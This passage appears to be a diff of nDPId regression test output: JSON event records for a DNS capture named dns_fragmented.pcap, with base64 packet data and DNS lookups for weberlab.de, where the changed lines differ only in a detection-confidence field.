00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1560869910534,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1560869910534,"pkt":"CFsOoYNeAAwpfKTLCABFAABQVdgAAEARt8DC9wUGwRjj7spPADUAPG1Sic4BIAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAADAAKAAgdxATcWA6WbA=="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1560869910547,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAXc3KUgAEARC2fBGOPuwvcFBgA1yk8Gysn4ic6FAAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOL
AqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdJ7GwXQAjwTN7CHdlYmVybGFiAmRlAMNkyiFqw0LN1nL6pdP6L0S5f+KeVqgdySg9DqllQznkc4qJdbBsIXZuBHa9Nq2W1+B1AxiyMctv3Lz\/wrXrHVsg2juMeE+GJDeZk+eFENsLzX3+aD8MAmUR+jj88geuho5ceQSzFyUDdJ+XlfOoxjx0giMIxIhGiGanPdqN3WDxDmc+G+u6JOLetuSRoW68C7okFrNLG+mUFMZGwuLAP+R5PUfRyHsFVzWhnrGaSrLry8iwPrcWPWvU+u3umasIdMK4SCw7vwP10JC5YIuQlDEZRVcmPkIjce\/vEUWCm7ZZ0rsSIQEfmsemGNvyEk8V6nVyCDOB1I7uCvg8vXpRAniloVYSi+VJJIo3oKpXQqXNjlQqmgLhs5xEyKK6ORyAtFwnMM2NNw\/n3r316JEFhydJQ27s1H8BA6wt7WBwYExhUjby5cAGKMUkk9RhAUVEopBhjLtTxq6B+h0kKU0z7k+MOs3tVRqjJb8K1sWKAtlqN79JssWSh32hOS6Gd60vt\/ISeUZ\/EqYRnbXyo9ywoMlGtHLKZz5Z1n609xm9BevoBVLtFlKhRNX\/7l1V3aRa64XbDmuycAg5TfDAgQ+GxPCr2eOFv0Gn2M4wfcUVujiys29jimhw6z0uJzU6zzXdu7tXJDPc2u\/\/F884++8b\/+59w8Q7XcWcHt3CD\/KZN567w2MALgABAAAAPAEfADAKAgAAADxdJ7GwXQAjwZBHCHdlYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRM="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00210{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":258,"global_ts_msec":1560869910547} 00677{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":292,"pkt_l4_len":0,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAEW3KUAuUARL3TBGOPuwvcFBl6hQbZluEkBQwQEC7uB5qnEntTXP5SqGQVKLxC7qNE6cyKHnHOaLFc6M7ZGIdPx4zNAweqKWt57GZ3P7usfiMKCCkCDZh6dEzOm+Gt\/T44RZQ2HCrp01hWU1aDVh\/WjEJGxnpeKral6aV7go6SChtYQKB0QtoychkpQnRa2kBkm4JsAg+9qTdiAdw09HhJvHWUpFM9bpDGMWwcnlf8HqY0xW2ob3vDNo7+6BXAfzVC3YuWmPlZvzvcC0xt3s5BgvCEnt+HEn3E0mfpKVVGnoL7U\/ZbK7\/tTSaA\/6wAAKRAAAACAAAAcAAoAGB3EBNxYDpZslD4VVl0I\/BakNFp6chM\/YQ=="} 
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1560869913732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869913732,"pkt":"CFsOoYNeAAwpfKTLht1gCfvPADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER7IYANQA07tw\/fwEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAEAACkCAAAAAAAAAA=="} -00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1560869913751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":134,"pkt_l4_len":80,"thread_ts_msec":1560869913751,"pkt":"AAwpfKTLCFsOoYNeht1gDizvAFARPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXshgBQyy0\/f4GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAHADAAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTAAApBawAAAAAAAA="} -00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} +00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="} 
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 
+00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":50,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869913753,"flow_last_seen":1560869913754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869913754,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1560869916459,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869916459,"pkt":"CFsOoYNeAAwpfKTLht1gAxE1ADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER1T4ANQA07tzo3wEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAEAACkCAAAAAAAAAA=="} -00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1560869916473,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":122,"pkt_l4_len":68,"thread_ts_msec":1560869916473,"pkt":"AAwpfKTLCFsOoYNeht1gCEAKAEQRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXVPgBEGsro34GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAHADAABAAEAAA4QAATC9wUOAAApBawAAAAAAAA="} -00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}} +00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"} 
